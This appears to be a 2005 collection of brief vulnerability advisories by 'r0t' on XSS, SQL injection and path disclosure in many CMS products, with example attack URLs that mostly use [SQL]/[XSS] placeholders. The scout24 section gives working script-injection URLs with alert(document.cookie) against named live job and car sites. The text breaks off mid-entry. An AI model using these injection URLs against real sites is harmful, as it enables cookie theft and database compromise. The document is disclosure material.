Date: 18 dec. 2005
vendor:http://www.mindroute.us/?id=2452
affected version: latest


Vuln. Description:

damoon® contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution:
Edit the source code to ensure that input is properly sanitised.

lemoon® XSS vuln

lemoon® XSS vuln

Vuln. discovered by : r0t
Date: 18 dec. 2005
vendor:http://www.mindroute.us/?id=426
affected version: 2.0 and prior


Product Description:

lemoon® is a fully packaged CM software solution that combines simplicity with versatility. It requires no third party licenses and thus offers a very competitive price. A free demo is available. Customers using lemoon� includes Sony Ericsson, Precise Biometrics, Q-MATIC, AudioDev, Pharmadule Emtunga and more.

Vuln. Description:

lemoon® contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution:
Edit the source code to ensure that input is properly sanitised.

Komodo CMS vuln.

Komodo CMS vuln.

Vuln. discovered by : r0t
Date: 18 dec. 2005
vendor:http://www.komodocms.com/
affected version:v2.1 and prior + other editions can have same vuln.


Product Description:

Intuitive, simple-to-use and powerful web content management system. Cross browser and cross platform, Komodo CMS has been developed to give control back to organizations, empowering them to maintain and manage their web infrastructure. Komodo CMS is particularly suitable for organizations who see their website as a marketing and business generation channel. Why compromise on design or ease of use when you can have both? Komodo CMS purchase price includes design integration and training.


Vuln. Description:

1. SQL inj.

Komodo CMS contains a flaw that allows a remote sql injection attacks.Input passed to the "page" parameter in "page.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

example:

/page.php?page=[SQL]

Note: For testing or exploiting this vuln., switch off javascript support in your browser, cauz for an error Komodo will answer with redirect:)


2. XSS

Komodo CMS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


Solution:
Edit the source code to ensure that input is properly sanitised.

ODFaq SQL inj. vuln.

ODFaq SQL inj. vuln.

Vuln. discovered by : r0t
Date: 18 dec. 2005
vendor:http://www.oodie.com/project/odfaq/
affected version: 2.1.0 and prior

Product Description:

PHP application that allows you to manage frequently asked questions. You can create/edit/delete entries using user-friendly web based interface.

Vuln. Description:

ODFaq contains a flaw that allows a remote sql injection attacks.Input passed to the "cat" "srcText" parameter in "faq.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

examples:

/faq.php?cat=1[SQL]

/faq.php?p=search&srcText=r0t[SQL]&submit
=Go&cat_id=&srcWhat=&dosearch=1

Solution:
Edit the source code to ensure that input is properly sanitised.
----------------------------------------------------------------
PS. greeting´s to OSVDB Bloger's:)

Hot Banana XSS vuln.

Hot Banana XSS vuln.

Vuln. discovered by : r0t
Date: 17 dec. 2005
vendor:www.hotbanana.com/products/web-content-management-suite/
affected version: 5.3 and prior

Description:

Founded in 1999, Hot Banana powers Web sites for more than 180 companies worldwide. Designed for non-technical users, Hot Banana is a full-fledged Web Content Management Suite that manages the content creation and delivery process of a Web site. The Hot Banana Active Marketing Web Content Management Suite consists of the end-to-end integration of Web Content Management, Internet marketing, search engine optimization - SEO, and WebTrends 7.5 Web analytics. Hot Banana is an ideal Web site solution for online branding, corporate communications, lead generation & conversion campaigns, customer retention, PR, and event marketing programs. Hot Banana is available as Hot Banana On-Demand (Software-as-a-Service (SaaS)), or as Hot Banana Licensed. Clients include; Algoma Steel, Bell Industries, Parents Action for Children, Ansell Healthcare Europe, World Vision, Beaver Vending, Los Alamos School Board (New Mexico), Law Society of Upper Canada, Expertech, and The County of Simcoe. Hot Banana Software Inc. is profitable and privately held. www.hotbanana.com


Vuln. Description:

Hot Banana contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "keywords" paremter in "index.cfm" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

example:

/search/index.cfm?keywords=[XSS]&x=25&y=9

Solution:
Edit the source code to ensure that input is properly sanitised.

Honeycomb Archive & Honeycomb Archive Enterprise vuln.

Honeycomb Archive & Honeycomb Archive Enterprise vuln.

Vuln. discovered by : r0t
Date: 17 dec. 2005
vendor:http://www.quicksquare.com/
affected version:Honeycomb Archive 3.0 and Honeycomb Archive Enterprise


Product Description:

Honeycomb Archive™ is an image library service that functions as a stand-alone web site solution providing a central repository for graphics & files needed to support marketing, advertising, and sales personnel with print and web publishing needs. Industry leaders such as Master Lock® & Valvoline® rely on Honeycomb Archive™ every day to distribute the correct brand images to thousands of users from all over the world.


Vuln. Description:

1. Multiple SQL inj. vuln. in Honeycomb Archive and Honeycomb Archive Enterprise

Honeycomb Archive and Honeycomb Archive Enterprise contains a flaw that allows a remote sql injection attacks.Input passed to the "series" "cat_parent" "cat" "div" in "CategoryResults.cfm" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

examples:

/CategoryResults.cfm?div=7&cat=118&cat_parent=107&series=[SQL]
/CategoryResults.cfm?div=7&cat=118&cat_parent=[SQL]
/CategoryResults.cfm?div=7&cat=[SQL]
/CategoryResults.cfm?div=[SQL]

2. XSS in Honeycomb Archive Enterprise search module

Honeycomb Archive Enterprise contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution:
Edit the source code to ensure that input is properly sanitised.

FLIP XSS vuln.

FLIP XSS vuln.

Vuln. discovered by : r0t
Date: 17 dec. 2005
vendor:http://www.flipdev.org/
affected version: 0.9.0.1029 and prior

Product Description:

The Free Lanparty Inter-/Intranet Portal contains CMS, Groupware and LAN-Party specific features.

Vuln. Description:

FLIP contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "name" paremter in "text.php" and "frame" paremter in "forum.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/text.php?name=[XSS]
/forum.php?frame=[XSS]

Solution:
Edit the source code to ensure that input is properly sanitised.

FarCry XSS vuln.

FarCry XSS vuln.

Vuln. discovered by : r0t
Date: 17 dec. 2005
vendor:http://farcry.daemon.com.au/
affected version:3.0 and prior


Product Description:

FarCry is an open source Content Management System (CMS), originally developed by Daemon. It's fully functional, and runs in a host of Enterprise environments today. It requires the Macromedia ColdFusion MX platform and a viable enterprise database (currently FarCry supports MSSQL, Oracle, PostgreSQL and MySQL). The solution runs on Windows 2k+ a vareity of *nix platforms (including Solaris and OSX).


Vuln. Description:

FarCry contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search paremters in search module isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


Solution:
Edit the source code to ensure that input is properly sanitised.

Esselbach Storyteller CMS XSS vuln.

Esselbach Storyteller CMS XSS vuln.

Vuln. discovered by : r0t
Date: 17 dec. 2005
vendor:http://www.esselbach.com/
affected version: 1.8 and prior

Product Description:

Esselbach Storyteller CMS is a powerful Content Management System designed for high traffic websites

Vuln. Description:

Esselbach Storyteller CMS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search paremters in search module isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


Solution:
Edit the source code to ensure that input is properly sanitised.

EPiX™ Search query XSS vuln.

EPiX™ Search query XSS vuln.

Vuln. discovered by : r0t
Date: 17 dec. 2005
vendor:http://www.go-epix.net/
affected version:3.1.2 and prior


Product Description:

EPIX is a low cost portal solution with CMS capabilities as well as support for JSR168 portlets. It is J2EE (Java) based and runs on any platform.

Vuln. Description:

EPIX contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search query paremter in search module isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


Solution:
Edit the source code to ensure that input is properly sanitised.

e-publish CMS vuln.

e-publish CMS vuln.

Vuln. discovered by : r0t
Date: 17 dec. 2005
vendor:http://www.e-publish.gr/
affected version:v2.0 and prior

Product Description:

The e-publish web application is a content management system that is perfect for publishing newspapers, magazines or any other content, over the Internet. It is very convenient to manage the contents of the site with an easy and quick way throught the administration module. No special knowledge is required. e-publish integrates with a banner campaign utility. Throught this service the site owner can administer any advertizing banner campaign in the site. Available also in multilingual edition.

Vuln. Description:

1. SQl inj.

e-publish contains a flaw that allows a remote sql injection attacks.Input passed to the "id" parameter in "printer_friendly.cfm" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

2. XSS

e-publish contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "obcatid" and "comid" paremter isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/printer_friendly.cfm?id=[SQL]

/show.cfm?id=274&obcatid=10[XSS]

/show.cfm?id=279&how=5&obcatid=9&shfrm=
1&comid=[XSS]

Solution:
Edit the source code to ensure that input is properly sanitised.

Direct News SQL inj.

Direct News SQL inj.

Vuln. discovered by : r0t
Date: 17 dec. 2005
vendor: http://www.direct-news.net
affected version: 4.9 and prior


Product Description:

Direct News 4.9 is an easy-to-use CMS based on php-mysql. Its real goal is the simplicity and usability, in order to be used by all.In addition to the Wysiwyg editor, navigation-management, image library and image tools, Direct News 4.9 comes with a new Macromedia Flash compatibility.
Direct News is one of the few CMS to offers you the ability to manage directly your flash animations contents through the very easy interface of Direct News.
Direct News improve your Search Engine Optimization, by rewriting the links and allowing you to describe your content as you want.
Of course, Direct News can manage a shopping cart, and multiple languages websites (with chinese, russian..and others) and administration interfaces. Direct News is also available in a smaller-limited version.


Vuln. Description:

Direct News contains a flaw that allows a remote sql injection attacks.Input passed to the "setLang" and search module paremters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

example:
/?setLang=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

ContentServ 3.1 SQL inj.

ContentServ 3.1 SQL inj.

Vuln. discovered by : r0t
Date: 17 dec. 2005
vendor:http://www.contentserv.com/
affected version: 3.1 and prior

Product Description:

The ContentServ envelops more than simple Content Management. It stands for Enterprise Marketing Management Solutions and a holistic approach, aimed at providing full-scale support of all marketing activities. Thus, it also includes Cross Media Publishing, Customer Relationship Management, Catalog and Product Information Management, and also Media Asset Management, to name a few. The EMMS Suite provides a highly professional solution for the creation and maintenance of content, regardless of whether it is to be published in web, print, or other forms of media. Particularly attractive are the numerous possibilities to steer and control all processes concerning content. Among these are a detailed Workflow Management, intelligent definition of user rights, Version Management, and many more. Additionally, the system is structured in a very open manner, allowing easy and seamless blending into existing system environments, and trouble free connection with other components such as SAP or various databases. The most outstanding feature, however, lies in Cross Media Publishing. It enables the publication of content into any medium desired. This is possible by the support over 27 exchange formats. These interfaces make ContentServ the most innovative provider of solutions for the creation, maintenance and publication of content.

Vuln. Description:

ContentServ contains a flaw that allows a remote sql injection attacks.Input passed to the "StoryID" parameter in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

example:

/index.php?StoryID=[SQL]


Solution:
Edit the source code to ensure that input is properly sanitised.

t-online Server not ready :)

Server not ready

Dear T-Online User:

Unfortunately, we are experiencing technical difficulties at this time.
We are doing what we can to solve the problem as quickly as possible.
Please try again shortly.

Thank you for your patience!

Your T-Online Team



http://brisbane.t-online.de/fast-cgi/
tsc?q=r0t&mandant=toi&device=html&por
tallanguage=de&userlanguage=r0t

CONTENS "search.cfm" Multiple Input Validation Vuln.

CONTENS "search.cfm" Multiple Input Validation Vuln.

Vuln. discovered by : r0t
Date: 17 dec. 2005
vendor:http://www.contens.com
affected version:3.0 and prior

Product Description:

CONTENS Software GmbH provides Content Management Software (CMS) for companies with sophisticated online communication needs. Its line of products meets the demands of businesses from small online editors to international firms. A strong network of experienced partners conceives innovative and customized CONTENS solutions and implements them according to individual demands. With the help of the CONTENS platform-independent CMS products businesses can quickly realize and edit extensive online projects without any prior pro-gramming knowledge. Among the well-known businesses that use CONTENS Content Management products are Concordia Insurance Group, Credit Suisse, Davidoff, Discovery Channel, Eurocard, GlobeGround Servisair, Hapimag, HypoVereinsbank BKK, John Deere, Max-Planck, MVV Energie AG, Peri, ratiopharm, T-Mobile and Schwyzer Kantonalbank.

Vuln. Description:

1.XSS

CONTENS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "near" paremter in "search.cfm" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

/search.cfm?uselang_en=1&intern=0&targetgroup
=pub&fuseaction_sea=results&advanced=1&criteria
=r0t&submit.x=33&submit.y=10&submit=Search&bool
=or&itemsperpage=10&near=[XSS]


2.Full Path and sensitive infomation view.
To view install path and other sensitive information use one of this examples below:

/search.cfm?uselang_en=1&intern=0
&targetgroup=pub&fuseaction_sea=r
esults&advanced=1&criteria=r0t&su
bmit.x=33&submit.y=[CODE]

/search.cfm?uselang_en=1&intern=0
&targetgroup=pub&fuseaction_sea=r
esults&advanced=1&criteria=r0t&su
bmit.x=33&submit.y=10&submit=Sear
ch&bool=[CODE]

/search.cfm?uselang_en=1&intern=0
&targetgroup=pub&fuseaction_sea=r
esults&advanced=1&criteria=r0t&su
bmit.x=33&submit.y=10&submit=Sear
ch&bool=or&itemsperpage=[CODE]

/search.cfm?uselang_en=1&intern=0
&targetgroup=pub&fuseaction_sea=r
esults&advanced=1&criteria=r0t&su
bmit.x=33&submit.y=10&submit=[CODE]

/search.cfm?uselang_en=1&intern=0
&targetgroup=pub&fuseaction_sea=r
esults&advanced=1&criteria=r0t&su
bmit.x=[CODE]

/search.cfm?uselang_en=1&intern=0
&targetgroup=pub&fuseaction_sea=r
esults&advanced=1&criteria=[CODE]

/search.cfm?uselang_en=1&intern=0
&targetgroup=pub&fuseaction_sea=r
esults&advanced=[CODE]

/search.cfm?uselang_en=1&intern=[CODE]

Solution:
Edit the source code to ensure that input is properly sanitised.

contenite XSS vuln.

contenite XSS vuln.

Vuln. discovered by : r0t
Date: 17 dec. 2005
vendor:http://contenite.de/
affected version: 0.11 and prior

Product Description:

A CMS that stays out of your way contenite is an embedded content management system (eCMS) which is simple, powerful, and flexible. Now there are no more excuses not to update the frontpage of your online shop every week or to create a more pleasant looking entry page for your online forum or community site. - now. contenite is simple to set up through a web-based installer. It is simple to run - it only needs PHP, no database. It is powerful because there is a host of content types that are bundled with the system. It is flexible because the set of content types is extensible through a simple, object-oriented programming interface. contenite is not for every site. Its architecture makes it well suited for brochure sites with little interaction and few editors. For the web presence of a small to medium enterprise (SME), it is probably all you'll ever need. contenite is a breeze to add to static pages and works well to add this little extra flexibility to your existing CMS. It doesn't insist to manage complete pages. It just cares for those dynamic pieces within. Of course, it can manage your whole site if you like.


Vuln. Description:

Contenite contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "id" paremter in "home.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

example:

/home.php?id=[XSS]


Solution:
Edit the source code to ensure that input is properly sanitised.

Community Enterprise 4.x Multiple vuln.

Community Enterprise 4.x Multiple vuln.

Vuln. discovered by : r0t
Date: 17 dec. 2005
vendor:http://www.citysoft.com/
affected version: 4.x and prior

Product Description:

CitySoft's Community Enterprise software platform provide an easy-to-use, flexible CMS module that integrates with a wide variety of built-in applications such as document management, event management, and contact management. Non-technical users can easily create and manage pages and other content online.

Vuln. Description:

1.) SQL inj.
Community Enterprise contains a flaw that allows a remote sql injection attacks.Input passed to the "nodeID" "pageID" "ID" "parentid" "documentFormatId" parameter isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

2.) XSS
Community Enterprise contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "presentationSite" "docPublishYear" "docDescription" "publishState" "docAuthor" "docTitle" "subTopic" "topic" "topicRadio" "topicOnly" "startrow" "sortby" paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

3.) Full path
With errors from previous vuln. attacker can get full install path and other senstive information and does not verify user input supplied to the "documentid" "fuseaction" paremter. A malicious person can exploit this to gain knowledge of the full path to the installation directory by sending a HTTP request including invalid input to those paremters.

examples:

/index.cfm?fuseaction=page.viewPage&pageID=
1&nodeID=1[SQL]

/index.cfm?fuseaction=page.viewPage&pageID
=1[SQL]

/index.cfm?fuseaction=Document.showDocumentS
ection&sortby=PublishDate&startrow=8&topicOn
ly=&topicRadio=&topic=&subTopic=&docTitle=&d
ocAuthor=&publishState=&docDescription=&docP
ublishYear=&presentationSite=&parentid=16&I
D=1[SQL]

/index.cfm?fuseaction=Document.showDocumentS
ection&sortby=PublishDate&startrow=8&topicO
nly=&topicRadio=&topic=&subTopic=&docTitle=&
docAuthor=&publishState=&docDescription=&doc
PublishYear=&presentationSite=&parentid=[SQL]

/document/docWindow.cfm?fuseaction=document.v
iewDocument&documentid=1&documentFormatId=[SQL]


XSS examples

/index.cfm?fuseaction=
Document.showDocumentSection&sortby=PublishD
ate&startrow=8&topicOnly=&topicRadio=&topic=
&subTopic=&docTitle=&docAuthor=&publishState
=&docDescription=&docPublishYear=&presentati
onSite=[XSS]

/index.cfm?fuseaction=
Document.showDocumentSection&sortby=PublishDa
te&startrow=8&topicOnly=&topicRadio=&topic=&s
ubTopic=&docTitle=&docAuthor=&publishState=&d
ocDescription=&docPublishYear=[XSS]

/index.cfm?fuseaction=
Document.showDocumentSection&sortby=PublishDa
te&startrow=8&topicOnly=&topicRadio=&topic=&s
ubTopic=&docTitle=&docAuthor=&publishState=&d
ocDescription=[XSS]

/index.cfm?fuseaction=Document.showDocumentSe
ction&sortby=PublishDate&startrow=8&topicOnly
=&topicRadio=&topic=&subTopic=&docTitle=&docAu
thor=&publishState=[XSS]

/index.cfm?fuseaction=
Document.showDocumentSection&sortby=PublishD
ate&startrow=8&topicOnly=&topicRadio=&topic=
&subTopic=&docTitle=&docAuthor=[XSS]

/index.cfm?fuseaction=
Document.showDocumentSection&sortby=PublishDa
te&startrow=8&topicOnly=&topicRadio=&topic=&s
ubTopic=&docTitle=[XSS]

/index.cfm?fuseaction=
Document.showDocumentSection&sortby=PublishDa
te&startrow=8&topicOnly=&topicRadio=&topic=&
subTopic=[XSS]

/index.cfm?fuseaction=
Document.showDocumentSection&sortby=PublishDa
te&startrow=8&topicOnly=&topicRadio=&topic=[XSS]

/index.cfm?fuseaction=
Document.showDocumentSection&sortby=PublishDa
te&startrow=8&topicOnly=&topicRadio=[XSS]

/index.cfm?fuseaction=
Document.showDocumentSection&sortby=PublishDa
te&startrow=8&topicOnly=[XSS]

/index.cfm?fuseaction=Document.showDocumentSe
ction&sortby=PublishDate&startrow=[XSS]

/index.cfm?fuseaction=Document.showDocumentSect
ion&sortby=[XSS]

Full path example:

/index.cfm?fuseaction=r0t

/document/docWindow.cfm?fuseaction=docume
nt.viewDocument&documentid=r0t

Solution:
Edit the source code to ensure that input is properly sanitised.

Colony CMS XSS vuln.

Colony CMS XSS vuln.

Vuln. discovered by : r0t
Date: 17 dec. 2005
vendor: http://www.thinkcolony.co.uk
affected version: 2.75 and prior, also other Colony editions are vuln. like: Colony E–Commerce CMS,Colony Enterprise CMS,Colony Government CMS

Product Description:

Colony is a modular based website content management system allowing you to micro-manage details on every page to suit your requirements. A number of modules are pre-built and suit the needs of most clients. One of Colonies key strengths is its versatility and allows modules to be changed or created to exactly meet your needs.


Vuln. Description:

Colony contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


Solution:
Edit the source code to ensure that input is properly sanitised.

Cofax XSS vuln.

Cofax XSS vuln.

Vuln. discovered by : r0t
Date: 17 dec. 2005
vendor:http://www.cofax.org
affected version: 2.0 RC3 and prior

Product Description

Cofax is a web-based text and multimedia publication system. It was designed to simplify the presentation of newspapers on the Web and to expedite real-time Web publication. Currently, Cofax is used across the world as an open source, scalable and powerful content management solution provided by numerous independent solution providers.


Vuln. Description:

Cofax contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "searchstring" paremter isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


example:
/search.htm?searchstring2=&searchstring=[XSS]


Solution:
Edit the source code to ensure that input is properly sanitised.

Caravel CMS XSS

Caravel CMS XSS

Vuln. discovered by : r0t
Date: 17 dec. 2005
vendor:http://caravelcms.org/
affected version:3.0 Beta 1 and prior


Product Description:

Caravel is an open source, enterprise-grade CMS targetted at large distributed non-profits, denominations, universities, K12 districts, ISP's, municipalities and businesses. It offers WYSIWYG browser-based site editing on Mac, PC and Linux. Scales to thousands of sites. Offers specialty features like dynamic site generation, default site inheritance, project management, draggable columns and content blocks, Apache integration, and more.


Vuln. Description:

Caravel contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "folderviewer_attrs" "fileDN" paremters in multiple files isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

some examples:

/Introduction?&CB=CB1&fileDN=[XSS]

/Community/News?&CB=CB1&fileDN=[XSS]

/Community/News?&CB=CB1&fileDN=mnF%3
Djune2005.html%2CmnOD%3DNewsletter%2
CmnOD%3DMy%20Documents%2Cdc%3Demanuel
%2Cdc%3Dmennonite%2Cdc%3Dnet&folderv
iewer_attrs=[XSS]

/Introduction?&CB=CB1&fileDN=mnF%3D2.
3.html%2CmnOD%3DNews%2CmnOD%3DMy%20D
ocuments%2Cdc%3Demanuel%2Cdc%3Dmenno
nite%2Cdc%3Dnet&folderviewer_attrs=[XSS]


Solution:
Edit the source code to ensure that input is properly sanitised.

bitweaver multiple vuln.

bitweaver multiple vuln.

Vuln. discovered by : r0t
Date: 17 dec. 2005
vendor:bitweaver.org
affected version: 1.1 and 1.1.1 beta and prior

Product Description:

bitweaver is a rename of the TikiPro software, and is a web based open-source Web Application Framework software application that offers a wide range of features such as wiki, articles, phpBB bulletin board, newsletter, blogs, image photo gallery, file sharing, link directory, poll/survey, quiz, FAQ, banners, webmail, calendar, category. It is written in PHP and supports MySQL, PostgreSQL, Oracle, Sybase, and FireBird on Windows & Linux.

Vuln. Description:

1. SQL inj,

bitweaver contains a flaw that allows a remote sql injection attacks.Input passed to the "sort_mode" "post_id" "blog_id" parameter isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

some examples:

/fisheye/list_galleries.php?sort_mode=[SQL]
/blogs/view_post.php?post_id=[SQL]
/blogs/view.php?blog_id=[SQL]
/messages/message_box.php?sort_mode=[SQL]
/users/my.php?sort_mode=[SQL]

2. XSS

contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "sort_mode" "post_id" "blog_id" and search field in "/users/my_groups.php" paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

examples no needed, use first examples only change input.

3. Full path
With errors from previous vuln. attacker can get full install path and other senstive information.




Solution:
Edit the source code to ensure that input is properly sanitised.

Baseline CMS vuln.

Baseline CMS vuln.

Vuln. discovered by : r0t
Date: 17 dec. 2005
vendor:http://www.nma.ca/
affected version: 1.95 and prior

Product Description:

Baseline CMS is a powerful, web-based content management system that gives you a fast, easy way to update your website - without having to call a webmaster or learn a programming language. Baseline CMS is an investment in technology that will provide a long-term, highly versatile communication channel with low maintenance costs.

Vuln. Description:

1.XSS
Baseline CMS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "PageID" "SiteNodeID" in "Page.asp" paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

2.SQL inj.
Baseline CMS contains a flaw that allows a remote sql injection attacks.Input passed to the "SiteNodeID" parameter in "Page.asp" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

examples:

/Page.asp?PageID=[XSS]
/Page.asp?PageID=1&SiteNodeID=[XSS]
/Page.asp?PageID=1&SiteNodeID=[SQL]

Solution:
Edit the source code to ensure that input is properly sanitised.

scout24 vuln.

jobscout24.de

http://jobscout24.de/stellenangebote/
JSStsuch.asp?PN=2&PS=10&IDSTBF=-54&T
BID=%22%3E%3Cscript%3Ealert('docume
nt.cookie')%3C/script%3E

http://jobscout24.de/stellenangebote
/JSStsuch.asp?PN=2&PS=10&IDSTBF=%22%3
E%3Cscript%3Ealert(document.cookie)%3C/
script%3E


www.autoscout24.de

http://www.autoscout24.de/home/index/
detail.asp?ts=383334.4&id=fgucmbzdefa
&source=%22%3E%3Cscript%3Ealert(docum
ent.cookie)%3C/script%3E

http://www.autoscout24.de/home/index
/search.asp?make=r0t:)

other scout´s have same type vuln.
Maybe in small aplications XSS attacks are nothing, but in big portals like this one is very dangerous.

AWF (Adaptive Website Framework) vuln.

AWF (Adaptive Website Framework) vuln.

Vuln. discovered by : r0t
Date: 17 dec. 2005
vendor:http://www.awf-cms.org
affected version:2.10 and prior

Product Description:

AWF (Adaptive Website Framework) by Liquid Bytes is a Web framework, CMS, Web portal, news system, online community, etc. Its purpose is to simplify Web site creation and present content efficiently. It features design/content separation, multiple designs (themes), personalized page layout, a WYSIWYG editor, a package installer for adding new features with just one click, user/group-management, messaging/community modules, access protection of single pages or site sections, efficient caching, easy to use API functions, export options for documents, the ability to integrate Unix shell scripts or embed PHP code, and support for nearly unlimited languages, documents, and users.



Vuln. Description:

1. XSS
AWF contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "page" paremter isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

2. full path
AWF does not verify user input supplied to the "mode" paremter. A malicious person can exploit this to gain knowledge of the full path to the installation directory by sending a HTTP request including invalid input to those paremters.

examples:

/community/account.html?page=[XSS]
/community.html?mode=x

Solution:
Edit the source code to ensure that input is properly sanitised.

Amaxus vuln.

Amaxus vuln.

Vuln. discovered by : r0t
Date: 17 dec. 2005
vendor:http://www.boxuk.com/
affected version: 3 and prior

About Amaxus

Amaxus is Box UK's XML Content Management System, currently delivering hundreds of thousands of documents for a wide variety of organisations.

Amaxus drives the websites for:

* An organisation with 42,000 employees
* A £1.4billion security company
* An organisation with over 60,000 images
* The largest maritime museum in the world
* A 100-million album selling band
* The most famous war museum in the world
* A Central-Government department
* 7000 NHS users (Intranet)
* A Government education site with 20,000 registered users
* A site which receives 2.8 million unique users a year
* A site which has won two prestigious accessibility awards
* The home of Greenwich Mean Time
* An NHS Strategic Health Authority serving 1.4 million people

Amaxus:

* Was recently chosen out of 150 other CMS providers by the Government
* Beat off 123 other companies in an OJEC (European Union) tender

Vuln. Description:

Amaxus contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "change" paremter isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.



example:

/?search_word=&search.x=20&search.y=4&change=[XSS]


bonnus:)

/?search_word=&search.x=20&search.y=4&change=../

Solution:
Edit the source code to ensure that input is properly sanitised.

Allinta 2.3.x XSS vuln.

Allinta 2.3.x XSS vuln.

Vuln. discovered by : r0t
Date: 17 dec. 2005
vendor:http://www.allinta.com/
affected version:2.3.2 and prior

Product Description:

Create an easy to edit instant Multi language web site with full content
management using a WYSIWYG Editor, Login levels, Audit Trails, Security,
Statistics, Instant Templates, Access, SQL or MySQL scripts & much more.
Code ASP 3.0 & VBScript

Vuln. Description:

Allinta contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "s" in "faq.asp" and "searchQuery" in "search.asp" paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/faq.asp?s=[XSS]&roottopicID=&sa=1&submit=Search

/search.asp?searchQuery=[XSS]&go=
Search&submitted=true

Solution:
Edit the source code to ensure that input is properly sanitised.

Acuity CMS 2.6.x (ASP) XSS vuln.

Acuity CMS 2.6.x (ASP) XSS vuln.

Vuln. discovered by : r0t
Date: 17 dec. 2005
vendor:http://www.acuitycms.com/
affected version:2.6.2

Product Description:

Acuity CMS is a highly affordable, very easy to use content management system that offers a rich set of features despite its low price point. Advanced WYSIWYG editing (using Acuity Visual Editor), advanced code cleaning, menu management, integrated search, and much more. Although targeted at small to medium business, Acuity CMS can run very large and interactive websites.

Vuln. Description:

